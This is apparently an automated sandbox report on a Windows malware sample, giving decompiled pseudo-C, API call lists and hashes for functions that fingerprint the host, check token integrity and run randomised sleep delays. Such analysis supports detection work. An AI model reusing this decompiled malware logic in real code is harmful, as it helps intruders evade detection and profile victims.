                                                          0x047f23db
                                                          0x047f23dc
                                                          0x047f23dc
                                                          0x047f23ab
                                                          0x047f23f1

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,047F5C31,?,?,4D283A53,?,?), ref: 047F233B
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 047F2351
                                                          • _snwprintf.NTDLL ref: 047F2376
                                                          • CreateFileMappingW.KERNELBASE(000000FF,047FD2AC,00000004,00000000,00001000,?), ref: 047F2392
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,047F5C31,?,?,4D283A53), ref: 047F23A4
                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 047F23BB
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,047F5C31,?,?), ref: 047F23DC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,047F5C31,?,?,4D283A53), ref: 047F23E4
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: 1f58cff969713dde1fcdbe8f881b29584489b8f92aa829d5c36cd0bd23890584
                                                          • Instruction ID: 33f78b742033f280ff9927a63988c2f887682bca1090e45f2cf849b1ab1c37c9
                                                          • Opcode Fuzzy Hash: 1f58cff969713dde1fcdbe8f881b29584489b8f92aa829d5c36cd0bd23890584
                                                          • Instruction Fuzzy Hash: 2821C0B2600208BFD721ABA8DC45FCE77A9EF48710F104561FB05E7391E675E909CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F9135, Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E047F9135(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x47fd270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E047FA6CC( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x47fd2a4 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x47fd238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E047F7306(_v8 + _v8, _t64);
							}
							HeapFree( *0x47fd238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x47fd238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E047F7306(_v8 + _v8, _t64);
						}
						HeapFree( *0x47fd238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                                          0x047f9135
                                                          0x047f913d
                                                          0x047f9141
                                                          0x047f9144
                                                          0x047f9149
                                                          0x047f914b
                                                          0x047f9150
                                                          0x047f9150
                                                          0x047f9156
                                                          0x047f9158
                                                          0x047f9165
                                                          0x047f91c6
                                                          0x047f9167
                                                          0x047f916c
                                                          0x047f9172
                                                          0x047f9177
                                                          0x047f9185
                                                          0x047f9189
                                                          0x047f9198
                                                          0x047f919f
                                                          0x047f91a6
                                                          0x047f91a6
                                                          0x047f91b1
                                                          0x047f91b1
                                                          0x047f9189
                                                          0x047f9177
                                                          0x047f91c8
                                                          0x047f91ce
                                                          0x047f91d8
                                                          0x047f91da
                                                          0x047f91df
                                                          0x047f91ee
                                                          0x047f91f2
                                                          0x047f91fd
                                                          0x047f9204
                                                          0x047f920b
                                                          0x047f920b
                                                          0x047f9217
                                                          0x047f9217
                                                          0x047f91f2
                                                          0x047f9222
                                                          0x047f9224
                                                          0x047f9227
                                                          0x047f9229
                                                          0x047f922c
                                                          0x047f922f
                                                          0x047f9239
                                                          0x047f923d
                                                          0x047f9241

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 047F916C
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 047F9183
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 047F9190
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,047F5D20), ref: 047F91B1
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 047F91D8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 047F91EC
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 047F91F9
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,047F5D20), ref: 047F9217
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID:
                                                          • API String ID: 3239747167-0
                                                          • Opcode ID: a1952732d2151e75222c6550529bad47fd1e2f32418ffda365759baaf0e7bb6c
                                                          • Instruction ID: f3d870f5ee2e601fb2e8d11d39c9bea2855725e9796d3e949e3bc15365289fc8
                                                          • Opcode Fuzzy Hash: a1952732d2151e75222c6550529bad47fd1e2f32418ffda365759baaf0e7bb6c
                                                          • Instruction Fuzzy Hash: 4031F8B1A00209EFEB21DFA9DD84BAEB7F9EF44214B118469EA05D7310D774EE419B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F1A08, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E047F1A08(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x47fd25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E047FA71F(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E047FA734(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                          0x047f1a15
                                                          0x047f1a1c
                                                          0x047f1a23
                                                          0x047f1a37
                                                          0x047f1a42
                                                          0x047f1a5a
                                                          0x047f1a67
                                                          0x047f1a6a
                                                          0x047f1a6f
                                                          0x047f1a7a
                                                          0x047f1a7e
                                                          0x047f1a8d
                                                          0x047f1a91
                                                          0x047f1aad
                                                          0x047f1aad
                                                          0x047f1ab1
                                                          0x047f1ab1
                                                          0x047f1ab6
                                                          0x047f1aba
                                                          0x047f1ac0
                                                          0x047f1ac1
                                                          0x047f1ac8
                                                          0x047f1ace

                                                          APIs
                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 047F1A3A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 047F1A5A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 047F1A6A
                                                          • CloseHandle.KERNEL32(00000000), ref: 047F1ABA
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 047F1A8D
                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 047F1A95
                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 047F1AA5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                          • String ID:
                                                          • API String ID: 1295030180-0
                                                          • Opcode ID: bafd4d6da3361889883e01d510f66990c8c978a1aaa6820e65a6df564aaba5ac
                                                          • Instruction ID: 55f880bf60a14d38dc8a60a79c19ef9468002840017e0133df1f8af6f1a2533c
                                                          • Opcode Fuzzy Hash: bafd4d6da3361889883e01d510f66990c8c978a1aaa6820e65a6df564aaba5ac
                                                          • Instruction Fuzzy Hash: DA215975900248FFEB11DFA4DC84EEEBBB9EB08304F0041A6EA01A6390C7759E05EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F391F, Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(?), ref: 047F395A
                                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 047F39DD
                                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 047F3A1D
                                                          • SysFreeString.OLEAUT32(00000000), ref: 047F3A3F
                                                            • Part of subcall function 047F6F3A: SysAllocString.OLEAUT32(047FC290), ref: 047F6F8A
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 047F3A92
                                                          • SysFreeString.OLEAUT32(00000000), ref: 047F3AA1
                                                            • Part of subcall function 047F1AE2: Sleep.KERNELBASE(000001F4), ref: 047F1B2A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                          • String ID:
                                                          • API String ID: 2118684380-0
                                                          • Opcode ID: b020de7f0be7e7b165c8605721512eedc7adf18cee86d3fed18ee0945db0f593
                                                          • Instruction ID: 0d4f17fca3bf961f318bfaf8dcfd31950072dbcffac65cbc212825fe48f9f544
                                                          • Opcode Fuzzy Hash: b020de7f0be7e7b165c8605721512eedc7adf18cee86d3fed18ee0945db0f593
                                                          • Instruction Fuzzy Hash: C1513C75500609AFDB11CFA9C848A9EB7B6FF88744F148829EA05DB324EB35ED06CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F12E5, Relevance: 9.1, APIs: 6, Instructions: 60sleepmemorytimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E047F12E5(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x47fd238 = _t10;
				if(_t10 != 0) {
					 *0x47fd1a8 = GetTickCount();
					_t12 = E047F3E69(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L047FB08A();
							_t33 = _t14 + _t16;
							_t18 = E047F5548(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E047F4DA2(_t25) != 0) {
							 *0x47fd260 = 1; // executed
						}
						_t12 = E047F5BA2(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                          0x047f12e5
                                                          0x047f12eb
                                                          0x047f12ec
                                                          0x047f12f8
                                                          0x047f12fe
                                                          0x047f1305
                                                          0x047f1315
                                                          0x047f131a
                                                          0x047f1321
                                                          0x047f1323
                                                          0x047f1328
                                                          0x047f132e
                                                          0x047f1334
                                                          0x047f133e
                                                          0x047f1342
                                                          0x047f1344
                                                          0x047f1349
                                                          0x047f134a
                                                          0x047f134b
                                                          0x047f1350
                                                          0x047f1356
                                                          0x047f135f
                                                          0x047f1360
                                                          0x047f1365
                                                          0x047f136b
                                                          0x047f1377
                                                          0x047f1379
                                                          0x047f1379
                                                          0x047f1383
                                                          0x047f1383
                                                          0x047f1307
                                                          0x047f1309
                                                          0x047f1309
                                                          0x047f138d

                                                          APIs
                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,047F4EF2,?), ref: 047F12F8
                                                          • GetTickCount.KERNEL32 ref: 047F130C
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,047F4EF2,?), ref: 047F1328
                                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,047F4EF2,?), ref: 047F132E
                                                          • _aullrem.NTDLL(?,?,00000009,00000000), ref: 047F134B
                                                          • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,047F4EF2,?), ref: 047F1365
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                          • String ID:
                                                          • API String ID: 507476733-0
                                                          • Opcode ID: 2aaf7fbfb4a4977c1afd79ad48975b976c4b3dcceb302a83bc988938c97f8e14
                                                          • Instruction ID: 314fd307205b04630e4ed34a35ff373ca41c046664e9be984379a21f64311bc2
                                                          • Opcode Fuzzy Hash: 2aaf7fbfb4a4977c1afd79ad48975b976c4b3dcceb302a83bc988938c97f8e14
                                                          • Instruction Fuzzy Hash: 9711C272A44304FFE320ABA5DC0DB9A3B98EF44364F008925FE45D6780EAB4EC008660
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F5BA2, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 57%
                                                          			E047F5BA2(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E047F6C09();
				if(_t21 != 0) {
					_t59 =  *0x47fd25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x47fd25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x47fd160(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E047F496B( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x47fd2a8; // 0xaea5a8
					if( *0x47fd25c > 5) {
						_t8 = _t26 + 0x47fe5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x47fe9f5; // 0x44283a44
						_t27 = _t7;
					}
					E047F729A(_t27, _t27);
					_t31 = E047F232F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x47fd270 =  *0x47fd270 ^ 0x81bbe65d;
						_t32 = E047FA71F(0x60);
						 *0x47fd32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x47fd32c; // 0x52e95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x47fd32c; // 0x52e95b0
							 *_t51 = 0x47fe81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x47fd238, 0, 0x43);
							 *0x47fd2c8 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x47fd25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x47fd2a8; // 0xaea5a8
								_t13 = _t58 + 0x47fe55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x47fc287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E047F9135( ~_v8 &  *0x47fd270,  &E047FD00C); // executed
								_t54 = E047F888E(_t55);
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E047F87AE(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E047F51B0(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E047F1C66(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x47fd15c();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E047FA273(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}






























                                                          0x047f5ba2
                                                          0x047f5bad
                                                          0x047f5bb0
                                                          0x047f5bb3
                                                          0x047f5bb6
                                                          0x047f5bbd
                                                          0x047f5bbf
                                                          0x047f5bcb
                                                          0x047f5bcd
                                                          0x047f5bcd
                                                          0x047f5bd6
                                                          0x047f5bdc
                                                          0x047f5be1
                                                          0x047f5bfb
                                                          0x047f5c07
                                                          0x047f5c09
                                                          0x047f5c0e
                                                          0x047f5c18
                                                          0x047f5c18
                                                          0x047f5c10
                                                          0x047f5c10
                                                          0x047f5c10
                                                          0x047f5c10
                                                          0x047f5c1f
                                                          0x047f5c2c
                                                          0x047f5c33
                                                          0x047f5c38
                                                          0x047f5c38
                                                          0x047f5c40
                                                          0x047f5c43
                                                          0x047f5c69
                                                          0x047f5c75
                                                          0x047f5c7a
                                                          0x047f5c7f
                                                          0x047f5c81
                                                          0x047f5cad
                                                          0x047f5caf
                                                          0x047f5c83
                                                          0x047f5c87
                                                          0x047f5c8c
                                                          0x047f5c91
                                                          0x047f5c98
                                                          0x047f5c9e
                                                          0x047f5ca3
                                                          0x047f5ca9
                                                          0x047f5cb0
                                                          0x047f5cb2
                                                          0x047f5cb4
                                                          0x047f5cc3
                                                          0x047f5cc9
                                                          0x047f5cce
                                                          0x047f5cd0
                                                          0x047f5d00
                                                          0x047f5d02
                                                          0x047f5cd2
                                                          0x047f5cd2
                                                          0x047f5cd8
                                                          0x047f5ce5
                                                          0x047f5ceb
                                                          0x047f5ceb
                                                          0x047f5cf3
                                                          0x047f5cfc
                                                          0x047f5d03
                                                          0x047f5d05
                                                          0x047f5d07
                                                          0x047f5d0e
                                                          0x047f5d1b
                                                          0x047f5d25
                                                          0x047f5d27
                                                          0x047f5d29
                                                          0x00000000
                                                          0x00000000
                                                          0x047f5d2b
                                                          0x047f5d30
                                                          0x047f5d32
                                                          0x047f5d39
                                                          0x047f5d3d
                                                          0x047f5d40
                                                          0x047f5d55
                                                          0x047f5d59
                                                          0x047f5d5e
                                                          0x00000000
                                                          0x047f5d5e
                                                          0x047f5d42
                                                          0x047f5d44
                                                          0x00000000
                                                          0x00000000
                                                          0x047f5d4f
                                                          0x047f5d51
                                                          0x047f5d53
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x047f5d53
                                                          0x047f5d36
                                                          0x047f5d36
                                                          0x047f5d07
                                                          0x047f5c45
                                                          0x047f5c45
                                                          0x047f5c4a
                                                          0x047f5d60
                                                          0x047f5d64
                                                          0x047f5d6c
                                                          0x047f5d6c
                                                          0x00000000
                                                          0x047f5d64
                                                          0x047f5c50
                                                          0x047f5c53
                                                          0x047f5c5d
                                                          0x047f5c64
                                                          0x00000000
                                                          0x047f5d74
                                                          0x047f5d74
                                                          0x047f5d78
                                                          0x047f5d7c
                                                          0x047f5d7c

                                                          APIs
                                                            • Part of subcall function 047F6C09: GetModuleHandleA.KERNEL32(4C44544E,00000000,047F5BBB,00000000,00000000), ref: 047F6C18
                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 047F5C38
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                          • memset.NTDLL ref: 047F5C87
                                                          • RtlInitializeCriticalSection.NTDLL(052E9570), ref: 047F5C98
                                                            • Part of subcall function 047F1C66: memset.NTDLL ref: 047F1C7B
                                                            • Part of subcall function 047F1C66: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 047F1CBD
                                                            • Part of subcall function 047F1C66: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 047F1CC8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 047F5CC3
                                                          • wsprintfA.USER32 ref: 047F5CF3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 4246211962-0
                                                          • Opcode ID: 4bc6fe54c2274f2c73958e4f82fd22da0dc862d8c58edc87f9e80cee4a9de643
                                                          • Instruction ID: b4f6435c10271336d93896c07e2a5fcc3222caeb416e7da75b9c9977af97cd34
                                                          • Opcode Fuzzy Hash: 4bc6fe54c2274f2c73958e4f82fd22da0dc862d8c58edc87f9e80cee4a9de643
                                                          • Instruction Fuzzy Hash: E951BF71A11618FBEB21ABE4DD8CFAE77A8EB04714F048525E702D7342F678B945CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 047F62DA, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 22%
                                                          			E047F62DA(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E047FA71F(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E047FA734(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E047FA71F((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x47fd278 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                                          0x047f62e1
                                                          0x047f62e8
                                                          0x047f62ed
                                                          0x047f62f0
                                                          0x047f62f7
                                                          0x047f62fa
                                                          0x047f62fd
                                                          0x047f6302
                                                          0x047f6307
                                                          0x047f645b
                                                          0x047f645d
                                                          0x047f645f
                                                          0x047f6464
                                                          0x047f6464
                                                          0x047f630d
                                                          0x047f6310
                                                          0x047f6313
                                                          0x047f6315
                                                          0x047f6315
                                                          0x047f6319
                                                          0x00000000
                                                          0x00000000
                                                          0x047f631d
                                                          0x047f6349
                                                          0x047f634e
                                                          0x047f6350
                                                          0x047f6350
                                                          0x047f6353
                                                          0x047f6356
                                                          0x047f6356
                                                          0x047f6358
